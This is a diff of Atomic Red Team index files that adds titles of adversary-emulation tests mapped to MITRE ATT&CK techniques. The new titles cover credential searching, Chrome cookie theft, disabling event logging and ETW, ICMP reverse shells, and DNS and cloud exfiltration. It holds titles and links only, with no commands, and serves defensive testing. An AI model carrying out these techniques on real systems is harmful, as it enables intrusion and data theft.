   - Atomic Test #12: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
   - Atomic Test #13: List Credential Files via PowerShell [windows]
   - Atomic Test #14: List Credential Files via Command Prompt [windows]
+  - Atomic Test #15: Find Azure credentials [macos, linux]
+  - Atomic Test #16: Find GCP credentials [macos, linux]
+  - Atomic Test #17: Find OCI credentials [macos, linux]
 - T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1528 Steal Application Access Token](../../T1528/T1528.md)
   - Atomic Test #1: Azure - Dump All Azure Key Vaults with Microburst [iaas:azure]
@@ -2411,12 +2443,16 @@
   - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
   - Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
   - Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
+  - Atomic Test #11: ESXi - Local Account Discovery via ESXCLI [windows]
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
   - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
   - Atomic Test #2: Detect Virtualization Environment (FreeBSD) [linux]
   - Atomic Test #3: Detect Virtualization Environment (Windows) [windows]
-  - Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
+  - Atomic Test #4: Detect Virtualization Environment via ioreg [macos]
   - Atomic Test #5: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
+  - Atomic Test #6: Detect Virtualization Environment using sysctl (hw.model) [macos]
+  - Atomic Test #7: Check if System Integrity Protection is enabled [macos]
+  - Atomic Test #8: Detect Virtualization Environment using system_profiler [macos]
 - [T1069.002 Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md)
   - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
   - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -2512,6 +2548,8 @@
   - Atomic Test #36: Display volume shadow copies with "vssadmin" [windows]
   - Atomic Test #37: Identify System Locale and Regional Settings with PowerShell [windows]
   - Atomic Test #38: Enumerate Available Drives via gdr [windows]
+  - Atomic Test #39: Discover OS Product Name via Registry [windows]
+  - Atomic Test #40: Discover OS Build Number via Registry [windows]
 - [T1016.002 System Network Configuration Discovery: Wi-Fi Discovery](../../T1016.002/T1016.002.md)
   - Atomic Test #1: Enumerate Stored Wi-Fi Profiles And Passwords via netsh [windows]
 - [T1010 Application Window Discovery](../../T1010/T1010.md)
@@ -2615,6 +2653,8 @@
   - Atomic Test #6: Discover System Language by Environment Variable Query [linux]
   - Atomic Test #7: Discover System Language with dism.exe [windows]
   - Atomic Test #8: Discover System Language by Windows API Query [windows]
+  - Atomic Test #9: Discover System Language with WMIC [windows]
+  - Atomic Test #10: Discover System Language with Powershell [windows]
 - [T1012 Query Registry](../../T1012/T1012.md)
   - Atomic Test #1: Query Registry [windows]
   - Atomic Test #2: Query Registry with Powershell cmdlets [windows]
@@ -2639,6 +2679,8 @@
   - Atomic Test #11: Get Windows Defender exclusion settings using WMIC [windows]
 - [T1526 Cloud Service Discovery](../../T1526/T1526.md)
   - Atomic Test #1: Azure - Dump Subscription Data with MicroBurst [iaas:azure]
+  - Atomic Test #2: AWS - Enumerate common cloud services [iaas:aws]
+  - Atomic Test #3: Azure - Enumerate common cloud services [iaas:azure]
 - [T1018 Remote System Discovery](../../T1018/T1018.md)
   - Atomic Test #1: Remote System Discovery - net [windows]
   - Atomic Test #2: Remote System Discovery - net group Domain Computers [windows]
@@ -2674,6 +2716,7 @@
   - Atomic Test #9: Network Service Discovery for Containers [containers]
   - Atomic Test #10: Port-Scanning /24 Subnet with PowerShell [windows]
   - Atomic Test #11: Remote Desktop Services Discovery via PowerShell [windows]
+  - Atomic Test #12: Port Scan using nmap (Port range) [linux, macos]
 - [T1518 Software Discovery](../../T1518/T1518.md)
   - Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
   - Atomic Test #2: Applications Installed [windows]
@@ -2690,6 +2733,7 @@
   - Atomic Test #3: System Time Discovery in FreeBSD/macOS [linux, macos]
   - Atomic Test #4: System Time Discovery W32tm as a Delay [windows]
   - Atomic Test #5: System Time with Windows time Command [windows]
+  - Atomic Test #6: Discover System Time Zone via Registry [windows]
 
 # resource-development
 - T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2778,7 +2822,8 @@
 - T1592.002 Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1593.001 Social Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1589.001 Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1595.003 Wordlist Scanning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1595.003 Active Scanning: Wordlist Scanning](../../T1595.003/T1595.003.md)
+  - Atomic Test #1: Web Server Wordlist Scan [windows, linux, macos]
 - T1591.004 Identify Roles [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1598 Phishing for Information [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1595.001 Scanning IP Blocks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2815,6 +2860,7 @@
 - [T1491.001 Defacement: Internal Defacement](../../T1491.001/T1491.001.md)
   - Atomic Test #1: Replace Desktop Wallpaper [windows]
   - Atomic Test #2: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message [windows]
+  - Atomic Test #3: ESXi - Change Welcome Message on Direct Console User Interface (DCUI) [windows]
 - T1496.004 Cloud Service Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1496.001 Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1565 Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -2847,6 +2893,7 @@
   - Atomic Test #2: FreeBSD/macOS/Linux - Overwrite file with DD [linux, macos]
   - Atomic Test #3: Overwrite deleted data on C drive [windows]
   - Atomic Test #4: GCP - Delete Bucket [iaas:gcp]
+  - Atomic Test #5: ESXi - Delete VM Snapshots [windows]
 - T1498 Network Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1495 Firmware Corruption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1490 Inhibit System Recovery](../../T1490/T1490.md)
@@ -2878,6 +2925,7 @@
   - Atomic Test #12: Logoff System - Windows [windows]
   - Atomic Test #13: ESXi - Terminates VMs using pkill [windows]
   - Atomic Test #14: ESXi - Avoslocker enumerates VMs and forcefully kills VMs [windows]
+  - Atomic Test #15: ESXi - vim-cmd Used to Power Off VMs [windows]
 
 # initial-access
 - [T1133 External Remote Services](../../T1133/T1133.md)
@@ -2951,11 +2999,13 @@
   - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
   - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
   - Atomic Test #3: DNSExfiltration (doh) [windows]
+  - Atomic Test #4: Exfiltrate Data using DNS Queries via dig [macos, linux]
 - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites](../../T1567.003/T1567.003.md)
   - Atomic Test #1: Exfiltrate data with HTTP POST to text storage sites - pastebin.com (Windows) [windows]
 - [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
   - Atomic Test #1: Exfiltrate data with rclone to cloud Storage - Mega (Windows) [windows]
+  - Atomic Test #2: Exfiltrate data with rclone to cloud Storage - AWS S3 [linux, macos]
 - [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
   - Atomic Test #1: Data Transfer Size Limits [macos, linux]
   - Atomic Test #2: Network-Based Data Transfer in Small Chunks [windows]

atomics/Indexes/Indexes-Markdown/linux-index.md

@@ -350,7 +350,7 @@
 - T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -490,7 +490,9 @@
 - T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1572 Protocol Tunneling](../../T1572/T1572.md)
+  - Atomic Test #5: Microsoft Dev tunnels (Linux/macOS) [linux, macos]
+  - Atomic Test #6: VSCode tunnels (Linux/macOS) [linux, macos]
 - T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -510,7 +512,8 @@
 - T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1095 Non-Application Layer Protocol](../../T1095/T1095.md)
+  - Atomic Test #4: Linux ICMP Reverse Shell using icmp-cnc [linux]
 - T1001.003 Protocol or Service Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -668,6 +671,9 @@
   - Atomic Test #1: Find AWS credentials [macos, linux]
   - Atomic Test #3: Extract passwords with grep [linux, macos]
   - Atomic Test #6: Find and Access Github Credentials [linux, macos]
+  - Atomic Test #15: Find Azure credentials [macos, linux]
+  - Atomic Test #16: Find GCP credentials [macos, linux]
+  - Atomic Test #17: Find OCI credentials [macos, linux]
 - T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1552.006 Unsecured Credentials: Group Policy Preferences [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -792,6 +798,7 @@
 - [T1046 Network Service Discovery](../../T1046/T1046.md)
   - Atomic Test #1: Port Scan [linux, macos]
   - Atomic Test #2: Port Scan Nmap [linux, macos]
+  - Atomic Test #12: Port Scan using nmap (Port range) [linux, macos]
 - T1518 Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1124 System Time Discovery](../../T1124/T1124.md)
@@ -892,9 +899,11 @@
 - [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
   - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
   - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
+  - Atomic Test #4: Exfiltrate Data using DNS Queries via dig [macos, linux]
 - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
+  - Atomic Test #2: Exfiltrate data with rclone to cloud Storage - AWS S3 [linux, macos]
 - [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
   - Atomic Test #1: Data Transfer Size Limits [macos, linux]
 - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/macos-index.md

@@ -25,7 +25,10 @@
 - T1484.002 Domain Trust Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1562.009 Impair Defenses: Safe Boot Mode [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
-  - Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
+  - Atomic Test #4: Detect Virtualization Environment via ioreg [macos]
+  - Atomic Test #6: Detect Virtualization Environment using sysctl (hw.model) [macos]
+  - Atomic Test #7: Check if System Integrity Protection is enabled [macos]
+  - Atomic Test #8: Detect Virtualization Environment using system_profiler [macos]
 - T1218.004 Signed Binary Proxy Execution: InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.008 Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1574.001 Hijack Execution Flow: DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -304,7 +307,7 @@
 - T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1106 Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -432,7 +435,9 @@
 - T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1572 Protocol Tunneling](../../T1572/T1572.md)
+  - Atomic Test #5: Microsoft Dev tunnels (Linux/macOS) [linux, macos]
+  - Atomic Test #6: VSCode tunnels (Linux/macOS) [linux, macos]
 - T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -503,7 +508,8 @@
 - [T1115 Clipboard Data](../../T1115/T1115.md)
   - Atomic Test #3: Execute commands from clipboard [macos]
 - T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1005 Data from Local System](../../T1005/T1005.md)
+  - Atomic Test #3: Copy Apple Notes database files using AppleScript [macos]
 - T1560.002 Archive Collected Data: Archive via Library [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1185 Browser Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -551,6 +557,7 @@
 - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
   - Atomic Test #3: Steal Chrome Cookies via Remote Debugging (Mac) [macos]
+  - Atomic Test #5: Copy Safari BinaryCookies files using AppleScript [macos]
 - T1003.002 OS Credential Dumping: Security Account Manager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1110.002 Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1003.004 OS Credential Dumping: LSA Secrets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -588,6 +595,9 @@
   - Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
   - Atomic Test #3: Extract passwords with grep [linux, macos]
   - Atomic Test #6: Find and Access Github Credentials [linux, macos]
+  - Atomic Test #15: Find Azure credentials [macos, linux]
+  - Atomic Test #16: Find GCP credentials [macos, linux]
+  - Atomic Test #17: Find OCI credentials [macos, linux]
 - T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1552.006 Unsecured Credentials: Group Policy Preferences [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -631,7 +641,10 @@
   - Atomic Test #6: Enumerate users and groups [linux, macos]
   - Atomic Test #7: Enumerate users and groups [macos]
 - [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
-  - Atomic Test #4: Detect Virtualization Environment (MacOS) [macos]
+  - Atomic Test #4: Detect Virtualization Environment via ioreg [macos]
+  - Atomic Test #6: Detect Virtualization Environment using sysctl (hw.model) [macos]
+  - Atomic Test #7: Check if System Integrity Protection is enabled [macos]
+  - Atomic Test #8: Detect Virtualization Environment using system_profiler [macos]
 - T1069.002 Permission Groups Discovery: Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1007 System Service Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1040 Network Sniffing](../../T1040/T1040.md)
@@ -688,6 +701,7 @@
 - [T1046 Network Service Discovery](../../T1046/T1046.md)
   - Atomic Test #1: Port Scan [linux, macos]
   - Atomic Test #2: Port Scan Nmap [linux, macos]
+  - Atomic Test #12: Port Scan using nmap (Port range) [linux, macos]
 - [T1518 Software Discovery](../../T1518/T1518.md)
   - Atomic Test #3: Find and Display Safari Browser Version [macos]
 - T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -778,9 +792,11 @@
 - [T1048 Exfiltration Over Alternative Protocol](../../T1048/T1048.md)
   - Atomic Test #1: Exfiltration Over Alternative Protocol - SSH [macos, linux]
   - Atomic Test #2: Exfiltration Over Alternative Protocol - SSH [macos, linux]
+  - Atomic Test #4: Exfiltrate Data using DNS Queries via dig [macos, linux]
 - T1052.001 Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1567.003 Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
-- T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage](../../T1567.002/T1567.002.md)
+  - Atomic Test #2: Exfiltrate data with rclone to cloud Storage - AWS S3 [linux, macos]
 - [T1030 Data Transfer Size Limits](../../T1030/T1030.md)
   - Atomic Test #1: Data Transfer Size Limits [macos, linux]
 - T1052 Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -104,6 +104,7 @@
   - Atomic Test #3: attrib - Remove read-only attribute [windows]
   - Atomic Test #4: attrib - hide file [windows]
   - Atomic Test #5: Grant Full Access to folder for Everyone - Ryuk Ransomware Style [windows]
+  - Atomic Test #6: SubInAcl Execution [windows]
 - T1574.014 AppDomainManager [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1218.007 Signed Binary Proxy Execution: Msiexec](../../T1218.007/T1218.007.md)
   - Atomic Test #1: Msiexec.exe - Execute Local MSI file with embedded JScript [windows]
@@ -125,6 +126,7 @@
   - Atomic Test #11: Prevent Powershell History Logging [windows]
   - Atomic Test #12: Clear Powershell History by Deleting History File [windows]
   - Atomic Test #13: Set Custom AddToHistoryHandler to Avoid History File Logging [windows]
+  - Atomic Test #14: Clear PowerShell Session History [windows]
 - [T1202 Indirect Command Execution](../../T1202/T1202.md)
   - Atomic Test #1: Indirect Command Execution - pcalua.exe [windows]
   - Atomic Test #2: Indirect Command Execution - forfiles.exe [windows]
@@ -198,6 +200,9 @@
   - Atomic Test #5: Clear Windows Audit Policy Config [windows]
   - Atomic Test #6: Disable Event Logging with wevtutil [windows]
   - Atomic Test #7: Makes Eventlog blind with Phant0m [windows]
+  - Atomic Test #8: Modify Event Log Channel Access Permissions via Registry - PowerShell [windows]
+  - Atomic Test #9: Modify Event Log Channel Access Permissions via Registry 2 - PowerShell [windows]
+  - Atomic Test #10: Modify Event Log Access Permissions via Registry - PowerShell [windows]
 - [T1218.002 Signed Binary Proxy Execution: Control Panel](../../T1218.002/T1218.002.md)
   - Atomic Test #1: Control Panel Items [windows]
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -213,6 +218,7 @@
   - Atomic Test #22: Blackbit - Disable Windows Firewall using netsh firewall [windows]
   - Atomic Test #23: ESXi - Disable Firewall via Esxcli [windows]
   - Atomic Test #24: Set a firewall rule using New-NetFirewallRule [windows]
+  - Atomic Test #25: ESXi - Set Firewall to PASS Traffic [windows]
 - [T1553.003 Subvert Trust Controls: SIP and Trust Provider Hijacking](../../T1553.003/T1553.003.md)
   - Atomic Test #1: SIP (Subject Interface Package) Hijacking via Custom DLL [windows]
 - T1556.007 Hybrid Identity [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -344,6 +350,10 @@
   - Atomic Test #7: Disable .NET Event Tracing for Windows Via Registry (powershell) [windows]
   - Atomic Test #8: LockBit Black - Disable the ETW Provider of Windows Defender -cmd [windows]
   - Atomic Test #9: LockBit Black - Disable the ETW Provider of Windows Defender -Powershell [windows]
+  - Atomic Test #10: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - Cmd [windows]
+  - Atomic Test #11: Disable .NET Event Tracing for Windows Via Environment Variable HKCU Registry - PowerShell [windows]
+  - Atomic Test #12: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - Cmd [windows]
+  - Atomic Test #13: Disable .NET Event Tracing for Windows Via Environment Variable HKLM Registry - PowerShell [windows]
 - T1036.002 Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1070 Indicator Removal on Host](../../T1070/T1070.md)
@@ -458,6 +468,10 @@
   - Atomic Test #51: Delete Microsoft Defender ASR Rules - InTune [windows]
   - Atomic Test #52: Delete Microsoft Defender ASR Rules - GPO [windows]
   - Atomic Test #53: AMSI Bypass - Create AMSIEnable Reg Key [windows]
+  - Atomic Test #54: Disable EventLog-Application Auto Logger Session Via Registry - Cmd [windows]
+  - Atomic Test #55: Disable EventLog-Application Auto Logger Session Via Registry - PowerShell [windows]
+  - Atomic Test #56: Disable EventLog-Application ETW Provider Via Registry - Cmd [windows]
+  - Atomic Test #57: Disable EventLog-Application ETW Provider Via Registry - PowerShell [windows]
 - T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -797,6 +811,7 @@
   - Atomic Test #17: Modify BootExecute Value [windows]
   - Atomic Test #18: Allowing custom application to execute during new RDP logon session [windows]
   - Atomic Test #19: Creating Boot Verification Program Key for application execution during successful boot [windows]
+  - Atomic Test #20: Add persistence via Windows Context Menu [windows]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
   - Atomic Test #1: Admin Account Manipulate [windows]
   - Atomic Test #2: Domain Account and Group Manipulate [windows]
@@ -930,7 +945,8 @@
   - Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
   - Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
   - Atomic Test #5: Run Shellcode via Syscall in Go [windows]
-- T1059.010 AutoHotKey & AutoIT [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
+- [T1059.010 Command and Scripting Interpreter: AutoHotKey & AutoIT](../../T1059.010/T1059.010.md)
+  - Atomic Test #1: AutoHotKey script execution [windows]
 - [T1059 Command and Scripting Interpreter](../../T1059/T1059.md)
   - Atomic Test #1: AutoIt Script Execution [windows]
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1156,6 +1172,7 @@
   - Atomic Test #17: Modify BootExecute Value [windows]
   - Atomic Test #18: Allowing custom application to execute during new RDP logon session [windows]
   - Atomic Test #19: Creating Boot Verification Program Key for application execution during successful boot [windows]
+  - Atomic Test #20: Add persistence via Windows Context Menu [windows]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
   - Atomic Test #1: Admin Account Manipulate [windows]
   - Atomic Test #2: Domain Account and Group Manipulate [windows]
@@ -1270,6 +1287,7 @@
   - Atomic Test #12: RustDesk Files Detected Test on Windows [windows]
   - Atomic Test #13: Splashtop Execution [windows]
   - Atomic Test #14: Splashtop Streamer Execution [windows]
+  - Atomic Test #15: Microsoft App Quick Assist Execution [windows]
 - T1659 Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1572 Protocol Tunneling](../../T1572/T1572.md)
@@ -1476,6 +1494,7 @@
 - [T1539 Steal Web Session Cookie](../../T1539/T1539.md)
   - Atomic Test #1: Steal Firefox Cookies (Windows) [windows]
   - Atomic Test #2: Steal Chrome Cookies (Windows) [windows]
+  - Atomic Test #4: Steal Chrome v127+ cookies via Remote Debugging (Windows) [windows]
 - [T1003.002 OS Credential Dumping: Security Account Manager](../../T1003.002/T1003.002.md)
   - Atomic Test #1: Registry dump of SAM, creds, and secrets [windows]
   - Atomic Test #2: Registry parse with pypykatz [windows]
@@ -1690,6 +1709,7 @@
   - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
